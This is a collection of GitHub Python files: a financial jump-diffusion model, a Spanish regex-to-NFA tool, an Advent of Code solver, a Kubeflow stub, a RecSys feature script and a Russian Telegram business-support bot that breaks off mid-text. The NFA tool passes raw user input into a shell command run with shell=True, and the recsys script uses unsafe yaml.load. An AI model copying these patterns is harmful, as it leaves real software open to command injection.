np.dot(self.cholesky_matrix, rand[:, t, :])\n ran = ran[self.rn_set]\n poi = np.random.poisson(self.lamb * dt, I)\n # full truncation Euler discretization\n paths_[t] = (paths_[t - 1] + self.kappa *\n (self.theta - np.maximum(0, paths_[t - 1])) * dt +\n np.sqrt(np.maximum(0, paths_[t - 1])) *\n self.volatility * np.sqrt(dt) * ran +\n ((np.exp(self.mu + self.delt * snr[t]) - 1) * poi) *\n np.maximum(0, paths_[t - 1]) - rj * dt)\n paths[t] = np.maximum(0, paths_[t]) + self.shift_values[t, 1]\n self.instrument_values = paths\n\n def update_forward_rates(self, time_grid=None):\n if time_grid is None:\n self.generate_time_grid()\n time_grid = self.time_grid\n t = get_year_deltas(time_grid)\n g = np.sqrt(self.kappa ** 2 + 2 * self.volatility ** 2)\n sum1 = ((self.kappa * self.theta * (np.exp(g * t) - 1)) /\n (2 * g + (self.kappa + g) * (np.exp(g * t) - 1)))\n sum2 = self.initial_value * ((4 * g ** 2 * np.exp(g * t)) /\n (2 * g + (self.kappa + g) *\n (np.exp(g * t) - 1)) ** 2)\n self.forward_rates = np.array(list(zip(time_grid, sum1 + sum2)))\n","repo_name":"yhilpisch/dx","sub_path":"dx/models/square_root_jump_diffusion.py","file_name":"square_root_jump_diffusion.py","file_ext":"py","file_size_in_byte":9717,"program_lang":"python","lang":"en","doc_type":"code","stars":666,"dataset":"github-code","pt":"38"} +{"seq_id":"19537089003","text":"import subprocess\nfrom Pila import Pila\nimport constantes\nimport os\n\nsimbolos = constantes.CONSTANT_S\nflecha = constantes.CONSTANT_F\noperadoresunarios = constantes.CONSTANT_U\n\ndef obtenerExpresionPostFija(expresionInfija):\n miComando = 'java App \"'+expresionInfija+'\"'\n tempStr = subprocess.check_output(miComando, shell=True)\n return list(tempStr.decode(\"utf-8\").strip())\n\ndef evaluarExpresion(expresionPostFijaList):\n\n pila = Pila()\n \n listaFinal = []\n\n i = 0\n\n contador = 1\n\n for j in expresionPostFijaList:\n\n caracter = j\n\n if caracter in simbolos:\n\n listaDeOperandos = []\n \n operandosNecesarios = 1 if caracter in operadoresunarios else 2\n\n elemento = ()\n\n for i in range(operandosNecesarios):\n\n elemento = pila.extraer()\n\n listaDeOperandos.append(elemento)\n \n print(listaDeOperandos)\n if operandosNecesarios == 1:\n listaDeIniciales = []\n listaDeFinales = []\n\n for i in listaDeOperandos:\n inicial,final = obtenerEstadoInicialYFinal(i,caracter)\n listaDeIniciales.append(inicial)\n listaDeFinales.append(final)\n\n listaDeTuplas = obtenerInstruccionesDeOperadoresUnitarios(caracter,contador,listaDeIniciales,listaDeFinales)\n listaTemporal = unirListas(listaDeOperandos,listaDeTuplas)\n pila.incluir(listaTemporal)\n\n else:\n\n listaDeIniciales = []\n listaDeFinales = []\n \n \n for i in listaDeOperandos:\n inicial, final = obtenerEstadoInicialYFinal(i,caracter)\n listaDeIniciales.append(inicial)\n listaDeFinales.append(final)\n\n listaDeIniciales.sort() \n listaDeFinales.sort()\n\n\n if caracter == \"|\":\n \n listaDeTuplas = obtenerInstruccionesDeOperadoresNoUnitarios(caracter,contador,listaDeIniciales,listaDeFinales,listaDeOperandos)\n \n contador+=2\n \n else:\n\n listaDeTuplas, nodoAEliminar = obtenerInstruccionesDeOperadoresNoUnitarios(caracter,contador,listaDeIniciales,listaDeFinales,listaDeOperandos)\n \n for operando in listaDeOperandos:\n for tupla in operando:\n if nodoAEliminar in tupla:\n operando.remove(tupla)\n \n for operando in listaDeOperandos:\n if len(operando) ==0:\n listaDeOperandos.remove(operando)\n \n listaTemporal =list(set(unirListas(listaDeOperandos,listaDeTuplas)))\n pila.incluir(listaTemporal)\n\n else:\n \n tuplaTemporal = [(str(contador), str(contador+1), caracter)]\n contador+=2\n \n pila.incluir(tuplaTemporal)\n\n\n for i in range(pila.tamano()):\n elemento = pila.extraer()\n for tupla in elemento:\n a,b = tupla[0], tupla[1]\n\n if int(a) != int(b):\n listaFinal.append(tupla)\n\n listaFinal.reverse()\n listaFinal = [listaFinal]\n\n return listaFinal\n\ndef unirListas(llistaUno, listaDos):\n listaF = []\n\n for i in llistaUno:\n for elemento in i:\n listaF.append(elemento)\n for i in listaDos:\n listaF.append(i)\n return listaF\n\ndef obtenerEstadoInicialYFinal(lista, caracter):\n inicial = 0\n final = 0\n\n listaAuxiliar = []\n\n for tupla in lista:\n\n for j in range(2):\n listaAuxiliar.append(int(tupla[j]))\n\n listaAuxiliar = sorted(set(listaAuxiliar))\n\n final = max(listaAuxiliar)\n\n listaAuxiliar.pop()\n\n if caracter == \"*\" or caracter == \"+\":\n inicial = max(listaAuxiliar)\n elif caracter == \"|\" or caracter == \".\":\n inicial = min(listaAuxiliar)\n\n\n \n\n return inicial, final\n\ndef obtenerInstruccionesDeOperadoresNoUnitarios(operador, contador, listaDeIniciales, listaDeFinales,listaDeOperandos):\n\n listaDeTuplas = []\n\n inicial = contador\n final = contador+1\n\n if operador == \".\":\n listaDeOperandos.reverse()\n operandoA, operandoB = listaDeOperandos[0], listaDeOperandos[1]\n\n inicialA, finalA = obtenerEstadoInicialYFinal(operandoA,\".\")\n inicialB, finalB = obtenerEstadoInicialYFinal(operandoB,\".\")\n nuevoNodo = min(finalA,inicialB)\n nodoAEliminar = max(finalA, inicialB)\n\n for operando in listaDeOperandos:\n for tupla in operando:\n\n a,b,c = tupla[0], tupla[1],tupla[2]\n\n if str(nodoAEliminar) in tupla:\n\n for i in range(len(tupla)-1):\n\n a = nuevoNodo if a == str(nodoAEliminar) else a\n b = nuevoNodo if b == str(nodoAEliminar) else b\n\n listaDeTuplas.append((a,b,c))\n return listaDeTuplas, str(nodoAEliminar)\n\n if operador == \"|\":\n\n for i in range(2):\n \n listaDeTuplas.append((str(inicial),str(listaDeIniciales[i]),\"ε\"))\n \n listaDeTuplas.append((str(listaDeFinales[i]),str(final),\"ε\"))\n\n return listaDeTuplas\n\ndef obtenerInstruccionesDeOperadoresUnitarios(operador, contador,listaDeIniciales,listaDeFinales):\n listaDeTuplas = []\n\n inicial = contador - 2\n final = contador - 1\n\n\n if operador == \"+\":\n\n listaDeTuplas.append((str(listaDeFinales[0]) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(contador) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(final) , str(contador+1), \"ε\")) \n \n elif operador == \"*\":\n\n listaDeTuplas.append((str(listaDeFinales[0]) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(contador) , str(listaDeIniciales[0]) , \"ε\"))\n listaDeTuplas.append((str(final) , str(contador+1), \"ε\")) \n\n listaDeTuplas.append((str(contador) , str(contador+1), \"ε\")) \n \n return listaDeTuplas\n\ndef obtenerEstadoInicialFinal(listaDeTuplas):\n listaTemporal = []\n for i in range(len(listaDeTuplas)):\n iTupla = listaDeTuplas[i]\n for j in range(len(iTupla)-1):\n listaTemporal.append(listaDeTuplas[i][j])\n\n listaTemporal = list(set(listaTemporal))\n\n final = max(listaTemporal)\n\n posicion = 0\n \n while posicion < len(listaTemporal):\n if listaTemporal[posicion] == final:\n listaTemporal.pop(posicion)\n\n posicion+=1\n\n inicial = max(listaTemporal)\n\n return inicial,final\n\ndef probarApp():\n expresionInfija = input(\":\")\n expresionPostFijaList = obtenerExpresionPostFija(expresionInfija)\n listaDeTuplas = evaluarExpresion(expresionPostFijaList)\n obtenerArchivo(listaDeTuplas)\n\ndef obtenerArchivo(listaDeTuplas):\n str1 = \"digraph AFN{\"+\"\\n\"\n str2 = \"rankdir = LR;\"+\"\\n\"\n str3 = 'node[shape=circle, style=\"filled\", fixedsize=true,width=0.2, color=\"#FFF7A8\", fontsize=8]'+\"\\n\"\n str4 = \"edge [ fontname=Arial, fontcolor=blue, fontsize=8 ];\"\n str5 = 'node [name = \"1\"];'+\"\\n\"\n str6 = \"}\"\n\n lista = [str1,str2,str3,str4,str5]\n\n f = open(\"input.dot\", \"w\")\n \n for m in lista:\n f.write(str(m))\n\n for elemento in listaDeTuplas:\n for tupla in elemento:\n a,b,c = str(tupla[0]),str(tupla[1]), str(tupla[2])\n nuevaStr = ''+a+' -> '+''+b+' [label = \"'+c+'\", color=\"red\"]'+\"\\n\"\n f.write(nuevaStr)\n f.write(str6)\n f.close()\n subprocess.call(\"dot -Tpng input.dot > output.png\", shell=True)\n\nprobarApp()","repo_name":"ExogearXxx/Compiladores_ESCOM","sub_path":"Copia/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":7967,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37792798057","text":"from __future__ import print_function\nimport numpy as np\n\nstart_file = open('./aoc_day_8_input.txt')\ninstructions = start_file.read().strip().splitlines()\n\n#screen = [[0]*50 for _ in range(6)]\nscreen = np.zeros((6,50))\n\ndef get_screen_string():\n return '\\n'.join([''.join(['#' if screen[r,c] == 1 else ' ' for c in range(50)]) for r in range(6)])\n\n\nfor line in instructions:\n info = line.split()\n if len(info) == 2:\n cols, rows = [int(v) for v in info[1].split('x')]\n for r in range(rows):\n for c in range(cols):\n screen[r, c] = 1\n else:\n distance = int(info[4])\n if info[1] == 'row':\n row = int(info[2].split('=')[1])\n screen[row] = np.roll(screen[row], distance)\n\n else:\n col = int(info[2].split('=')[1])\n screen.T[col] = np.roll(screen.T[col], distance)\n\n\nprint(np.sum(screen))\nprint(get_screen_string())\n\n\n\n\n\n\n","repo_name":"jtsimmons108/AdventOfCode2016","sub_path":"Day8/aoc_day_8.py","file_name":"aoc_day_8.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73081093869","text":"#!/usr/bin/env/python3\n\"\"\"\nyaml file based to implement pipeline components\n\"\"\"\n\nimport argparse\nimport json\n\nfrom kfp.v2.dsl import Dataset, Model, Metrics, Artifact\nfrom google.cloud import storage\n\n\ndef obtain_args():\n \"\"\"\n Get the args\n \"\"\"\n\n parser = argparse.ArgumentParser(description=\"\")\n\n parser.add_argument(\"--in-artifact-path\", type=Artifact, help=\"\") #name, uri, metadata\n parser.add_argument(\"--in-dataset-path\", type=Dataset, help=\"\") #name, uri, metadata\n parser.add_argument(\"--in-metrics-path\", type=Metrics, help=\"\") #name, uri, metadata\n parser.add_argument(\"--in-model-path\", type=Model, help=\"\") #name, uri, metadata\n # parser.add_argument(\"--out-metrics\", type=str, help=\"\")\n # parser.add_argument(\"--out-artifact\", type=str, help=\"\")\n # \n parser.add_argument(\"--output-metadata\", type=str, help=\"\") #name, uri, metadata\n parser.add_argument(\"--output-model\", type=Model, help=\"\") #name, uri, metadata\n # \n args = parser.parse_args()\n return args\n\n\n# Obtain args\nargs = obtain_args()\n\n# \nprint(\"args.in_artifact_path.name\", args.in_artifact_path.name)\nprint(\"args.in_dataset_path.name\", args.in_dataset_path.name)\nprint(\"args.in_metrics_path.name\", args.in_metrics_path.name)\nprint(\"args.in_model_path.name\", args.in_model_path.name)\n# \n# print(\"args.out_artifact.name\", args.out_artifact.name)\n# print(\"args.out_artifact.path\", args.out_artifact.path)\n# print(\"args.out_artifact.uri\", args.out_artifact.uri)\n# \nprint(\"args.output_metadata\", args.output_metadata)\n\nprint(\"args.output_model.name\", args.output_model.name)\nprint(\"args.output_model.path\", args.output_model.path)\nprint(\"args.output_model.uri\", args.output_model.uri)\n\n\"\"\"\n# ===============================\n# Collect data from storage\n# ===============================\n# Instantiates a client\nstorage_client = storage.Client()\nbucket = storage_client.bucket(args.original_bucket_id)\n\n# Download csv file from GCS\nblob = bucket.blob(args.target_filename) # train.csv or test.csv\ndata = blob.download_as_string()\ndf = pd.read_csv(io.BytesIO(data))\n\n# ===============================\n# Some feature engineering\n# 1. Mean fill + creating ratio\n# ===============================\n# Get mean value for the target column\nmean_target_col = df[\"TotalBsmtSF\"].mean()\n# Replace 0 value to mean\ndf[\"TotalBsmtSF_fillmean\"] = df[\"TotalBsmtSF\"].replace(0, mean_target_col)\n# Get mean value for the target column\nmean_target_col = df[\"BsmtUnfSF\"].mean()\n# Replace 0 value to mean\ndf[\"BsmtUnfSF_fillmean\"] = df[\"BsmtUnfSF\"].replace(0, mean_target_col)\ndf[\"BsmtUnfSF_TotalBsmtSF_ratio\"] = (\n df[\"BsmtUnfSF_fillmean\"] / df[\"TotalBsmtSF_fillmean\"]\n)\n\n# args.output_dataset has .path, .name, .metadata, and .uri\n# Save model and weights\nif not args.output_dataset.uri.startswith(\"gs://\"):\n save_full_path = args.output_dataset.name.replace(\"/gcs/\", \"gs://\")\nelse:\n save_full_path = args.output_dataset.uri\nprint(\"save_full_path\", save_full_path)\ndf.to_csv(save_full_path, index=False, header=True)\n\"\"\"","repo_name":"tkshnkmr/mlflow_demo","sub_path":"check_kfp/component2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13795759983","text":"import argparse\nimport os\nimport pickle\nimport yaml\nimport logging\nfrom collections import Counter\nfrom sipHash64 import sipHash64\nfrom read_dataset_utils import all_features_to_idx, labels_to_idx\nfrom utils import get_similar_interactions\n\n\nlog = logging.getLogger(__name__)\n\n\ndef get_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config-file\", type=str, default='config.yaml', help='Configuration file.')\n return parser\n\n\ndef process_example(features):\n engaged_with_user_id = features[all_features_to_idx['engaged_with_user_id']]\n enaging_user_id = features[all_features_to_idx['enaging_user_id']]\n\n # compute hash of `engaged_with_user_id` and `enaging_user_id` pairs\n key = sipHash64(f'{engaged_with_user_id}_{enaging_user_id}')\n\n hashtags = features[all_features_to_idx['hashtags']].split()\n # compute hash of hashtag and `enaging_user_id`\n key_hashtags = [sipHash64(f'{h}_{enaging_user_id}') for h in hashtags]\n\n language = features[all_features_to_idx['language']]\n # compute hash of language and `enaging_user_id`\n key_language = sipHash64(f'{language}_{enaging_user_id}')\n\n # compute hashes of users\n engaged_with_user_id = sipHash64(engaged_with_user_id)\n enaging_user_id = sipHash64(enaging_user_id)\n return engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language\n\n\ndef compute_interactions(config):\n def increase_reaction(relation, key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language):\n interaction_counter[relation][key] += 1\n num_enaged[relation][engaged_with_user_id] += 1\n num_enaging[relation][enaging_user_id] += 1\n\n interaction_counter_all[relation][key] += 1\n num_enaged_all[relation][engaged_with_user_id] += 1\n num_enaging_all[relation][enaging_user_id] += 1\n\n for key_hashtag_current in key_hashtags:\n user_hashtag_all[relation][key_hashtag_current] +=1\n user_hashtag[relation][key_hashtag_current] +=1\n\n\n interaction_counter_lang_all[relation][key_language] += 1\n interaction_counter_lang[relation][key_language] += 1\n\n # filenames with training data sepearated by day - calculated in `splt_by_date.py`\n filenames = [os.path.join(config['working_dir'], f) for f in os.listdir(config['working_dir']) if 'train_set' in f]\n\n # number of all enaged-enaging users interactions per each relation\n interaction_counter_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaged users per each relation\n num_enaged_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaging users per each relation\n num_enaging_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions with hashtags per each relation\n user_hashtag_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # number of all interactions of enaging users with twitts from each language\n interaction_counter_lang_all = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n\n for filename in filenames:\n log.info(f\"Processing {filename}\")\n # interactions only for data from current day\n interaction_counter = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n num_enaged = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n num_enaging = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n user_hashtag = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n interaction_counter_lang = {'like': Counter(), 'reply': Counter(), 'retweet': Counter(), 'retweet_with_comment': Counter()}\n\n # loading data from current day\n with open(filename, 'rb') as handle:\n train_day = pickle.load(handle)\n\n for example in train_day:\n line = example['line']\n features = line.split(\"\\x01\")\n engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language = process_example(features)\n\n if features[labels_to_idx[f'like_timestamp']] != '':\n increase_reaction('like', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n if features[labels_to_idx[f'reply_timestamp']] != '':\n increase_reaction('reply', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n\n if features[labels_to_idx[f'retweet_timestamp']] != '':\n increase_reaction('retweet', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n if features[labels_to_idx[f'retweet_with_comment_timestamp']] != '':\n increase_reaction('retweet_with_comment', key, engaged_with_user_id, enaging_user_id, key_hashtags, key_language)\n\n\n file_suffix = filename.split('_')[-1]\n\n with open(f\"\"\"{config['working_dir']}/interaction_users_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaged_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(num_enaged, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaging_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(num_enaging, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/user_hashtag_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(user_hashtag, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang_day_{file_suffix}\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter_lang, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n with open(f\"\"\"{config['working_dir']}/interaction_users\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaging\"\"\", 'wb') as handle:\n pickle.dump(num_enaging_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/num_enaged\"\"\", 'wb') as handle:\n pickle.dump(num_enaged_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/user_hashtag\"\"\", 'wb') as handle:\n pickle.dump(user_hashtag_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang\"\"\", 'wb') as handle:\n pickle.dump(interaction_counter_lang_all, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef save_interactions(config):\n log.info(\"Saving interactions\")\n with open(f\"\"\"{config['working_dir']}/author2similar_follow.pkl\"\"\", 'rb') as handle:\n auth2similar_followers = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/interaction_users\"\"\", 'rb') as handle:\n interaction_counter_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/num_enaging\"\"\", 'rb') as handle:\n num_enaging_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/num_enaged\"\"\", 'rb') as handle:\n num_enaged_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang\"\"\", 'rb') as handle:\n interaction_counter_lang_all = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/user_hashtag\"\"\", 'rb') as handle:\n user_hashtag_all = pickle.load(handle)\n\n filenames = [os.path.join(config['working_dir'], f) for f in os.listdir(config['working_dir']) if 'train_set_all' in f]\n for filename in filenames:\n log.info(f\"Processing {filename}\")\n\n # loading data from current day\n with open(filename, 'rb') as handle:\n train_day = pickle.load(handle)\n\n file_suffix = filename.split('_')[-1]\n\n with open(f\"\"\"{config['working_dir']}/interaction_users_day_{file_suffix}\"\"\", 'rb') as handle:\n interaction_counter = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/num_enaged_day_{file_suffix}\"\"\", 'rb') as handle:\n num_enaged = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/num_enaging_day_{file_suffix}\"\"\", 'rb') as handle:\n num_enaging = pickle.load(handle)\n\n with open(f\"\"\"{config['working_dir']}/user_hashtag_day_{file_suffix}\"\"\", 'rb') as handle:\n user_hashtag = pickle.load(handle)\n with open(f\"\"\"{config['working_dir']}/interaction_counter_lang_day_{file_suffix}\"\"\", 'rb') as handle:\n interaction_counter_lang = pickle.load(handle)\n\n interactions_without_current_day = {\n 'like': interaction_counter_all['like'] - interaction_counter['like'],\n 'reply': interaction_counter_all['reply'] - interaction_counter['reply'],\n 'retweet': interaction_counter_all['retweet'] - interaction_counter['retweet'],\n 'retweet_with_comment': interaction_counter_all['retweet_with_comment'] - interaction_counter['retweet_with_comment']\n }\n\n for i, example in enumerate(train_day):\n line = example['line']\n features = line.split(\"\\x01\")\n\n engaged_with_user_id_orig = features[all_features_to_idx['engaged_with_user_id']]\n enaging_user_id_orig = features[all_features_to_idx['enaging_user_id']]\n\n engaged_with_user_id, enaging_user_id, key, key_hashtags, key_language = process_example(features)\n\n num_enaged_like = num_enaged_all['like'][engaged_with_user_id] - num_enaged['like'][engaged_with_user_id]\n num_enaged_reply = num_enaged_all['reply'][engaged_with_user_id] - num_enaged['reply'][engaged_with_user_id]\n num_enaged_retweet = num_enaged_all['retweet'][engaged_with_user_id] - num_enaged['retweet'][engaged_with_user_id]\n num_enaged_retweet_with_comment = num_enaged_all['retweet_with_comment'][engaged_with_user_id] - num_enaged['retweet_with_comment'][engaged_with_user_id]\n\n num_enaging_like = num_enaging_all['like'][enaging_user_id] - num_enaging['like'][enaging_user_id]\n num_enaging_reply = num_enaging_all['reply'][enaging_user_id] - num_enaging['reply'][enaging_user_id]\n num_enaging_retweet = num_enaging_all['retweet'][enaging_user_id] - num_enaging['retweet'][enaging_user_id]\n num_enaging_retweet_with_comment = num_enaging_all['retweet_with_comment'][enaging_user_id] - num_enaging['retweet_with_comment'][enaging_user_id]\n\n interaction_users_like = interactions_without_current_day['like'][key]\n interaction_users_reply = interactions_without_current_day['reply'][key]\n interaction_users_retweet = interactions_without_current_day['retweet'][key]\n interaction_users_retweet_with_comment = interactions_without_current_day['retweet_with_comment'][key]\n\n similar_followers = get_similar_interactions(auth2similar_followers, engaged_with_user_id_orig, enaging_user_id_orig, interactions_without_current_day)\n\n interaction_counter_lang_like = interaction_counter_lang_all['like'][key_language] - interaction_counter_lang['like'][key_language]\n interaction_counter_lang_reply = interaction_counter_lang_all['reply'][key_language] - interaction_counter_lang['reply'][key_language]\n interaction_counter_lang_retweet = interaction_counter_lang_all['retweet'][key_language] - interaction_counter_lang['retweet'][key_language]\n interaction_counter_lang_retweet_with_comment = interaction_counter_lang_all['retweet_with_comment'][key_language] - interaction_counter_lang['retweet_with_comment'][key_language]\n user_hashtag_like = 0\n user_hashtag_reply = 0\n user_hashtag_retweet = 0\n user_hashtag_retweet_with_comment = 0\n\n for key_hashtag_current in key_hashtags:\n user_hashtag_like += (user_hashtag_all['like'][key_hashtag_current] - user_hashtag['like'][key_hashtag_current])\n user_hashtag_reply += (user_hashtag_all['reply'][key_hashtag_current] - user_hashtag['reply'][key_hashtag_current])\n user_hashtag_retweet += (user_hashtag_all['retweet'][key_hashtag_current] - user_hashtag['retweet'][key_hashtag_current])\n user_hashtag_retweet_with_comment += (user_hashtag_all['retweet_with_comment'][key_hashtag_current] - user_hashtag['retweet_with_comment'][key_hashtag_current])\n\n\n train_day[i]['interactions'] = [interaction_users_like, interaction_users_reply, interaction_users_retweet, interaction_users_retweet_with_comment,\n num_enaged_like, num_enaged_reply, num_enaged_retweet, num_enaged_retweet_with_comment,\n num_enaging_like, num_enaging_reply, num_enaging_retweet, num_enaging_retweet_with_comment,\n interaction_counter_lang_like, interaction_counter_lang_reply, interaction_counter_lang_retweet, interaction_counter_lang_retweet_with_comment,\n user_hashtag_like, user_hashtag_reply, user_hashtag_retweet, user_hashtag_retweet_with_comment\n ] + similar_followers\n\n with open(filename, 'wb') as handle:\n pickle.dump(train_day, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n parser = get_parser()\n params = parser.parse_args()\n with open(params.config_file) as f:\n config = yaml.load(f)\n compute_interactions(config)\n save_interactions(config)\n","repo_name":"Synerise/recsys-challenge-2021","sub_path":"src/preprocessing/compute_interactions.py","file_name":"compute_interactions.py","file_ext":"py","file_size_in_byte":14033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"38"} +{"seq_id":"21135745092","text":"# -*- coding: utf-8 -*-\nimport telebot\nimport constants, os\nimport botan\nfrom telebot import types\n\nbot = telebot.TeleBot(constants.token)\n\nclass BotMenu:\n def main_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"📦Пакеты услуг\")\n user_markup.row(\"💳Финансы\", \"✴Услуги\")\n user_markup.row(\"🎓Обучение\", \"🏢Коворкинг\")\n user_markup.row(\"📅События\", \"☎Контакты\")\n bot.send_message(message.from_user.id, \"Выберите интересующий Вас пункт\", reply_markup=user_markup)\n\n def cont_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"🚀Центр поддержки предпринимательства\")\n user_markup.row(\"🚩Иные организации развития бизнеса\")\n user_markup.row(\"✒Жалобы и предложения\")\n bot.send_message(message.from_user.id, \"Полезные контакты\", reply_markup=user_markup)\n\n def finance_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Субсидии\")\n user_markup.row(\"Микрозаймы и кредитование\")\n user_markup.row(\"Поручительства\")\n bot.send_message(message.from_user.id, \"Финансовая поддержка бизнеса\", reply_markup=user_markup)\n\n def subsid_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в 💳Финансы\")\n user_markup.row(\"Промышленность\")\n user_markup.row(\"Сельское хозяйство\")\n user_markup.row(\"Инновации\")\n user_markup.row(\"Служба занятости\")\n bot.send_message(message.from_user.id, \"Субсидии для бизнеса\", reply_markup=user_markup)\n\n def mfo_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в 💳Финансы\")\n user_markup.row(\"Старт\", \"Фермер\")\n user_markup.row(\"Бизнес-оборот\", \"Ремесленник\")\n user_markup.row(\"Бизнес-инвест\", \"Новотех\")\n user_markup.row(\"Развитие и инновации\")\n bot.send_message(message.from_user.id, \"Пакеты микрозаймов и кредитования\", reply_markup=user_markup)\n\n def uslugi_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Разработка бизнес-планов\")\n user_markup.row(\"Разработка веб-сайтов\")\n user_markup.row(\"Создание фирменного стиля\")\n user_markup.row(\"Маркетинговые исследования\")\n user_markup.row(\"Консультации\")\n user_markup.row(\"Иные услуги\")\n bot.send_message(message.from_user.id, \"Бесплатные услуги и консультации центра поддержки предпринимательства\", reply_markup=user_markup)\n\n def grad_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"Семинары центра поддержки\")\n user_markup.row(\"Школа молодого предпринимателя\")\n user_markup.row(\"«Бизнес класс»\")\n bot.send_message(message.from_user.id, \"Узнайте о действующих и предстоящих образовательных мероприятиях\",\n reply_markup=user_markup)\n\n def paketi_menu(self, bot, message):\n user_markup = telebot.types.ReplyKeyboardMarkup(True)\n user_markup.row(\"🔙 Вернуться в Меню\")\n user_markup.row(\"🚀Открывай\", \"📊Развивай\")\n user_markup.row(\"✅Производи\", \"🚚Экспортируй\")\n user_markup.row(\"📝Консультация On-Line\")\n bot.send_message(message.from_user.id, \"Выберите подходящий для Вас пакет услуг\",\n reply_markup=user_markup)\n\nbm = BotMenu()\n\n@bot.callback_query_handler(func=lambda c:True)\ndef inlin(c):\n if c.data == \"invest\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nДепартамент инвестиций и развития малого и среднего предпринимательства Краснодарского края\\n\nАдрес: 350014, г, Краснодар, ул. Красная, 35\ninvestkuban@krasnodar.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612517310\")\n if c.data == \"micro\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nФонд микрофинансирования субъектов малого и среднего предпринимательства Краснодарского края\\n\nАдрес: г. Краснодар, ул. Трамвайная, 2/6\\n \nПредставительство: г. Армавир, ул. Ефремова, д. 270, 3 этаж, офис 5\ninfo@fmkk.ru\\n\nПоказать на карте\"\"\", parse_mode=\"HTML\")\n bot.send_message(c.message.chat.id, \"+78612980808\")\n if c.data == \"garant\":\n bot.send_message(c.message.chat.id, \"\"\"\\r\nГарантийный фонд Краснодарского края\\n\nАдрес: г. Краснодар, ул. Трамвайная, 2/6, 5 этаж, офис 505\ninfo@gfkuban.ru\\n\nПоказать на карте\"\"\", 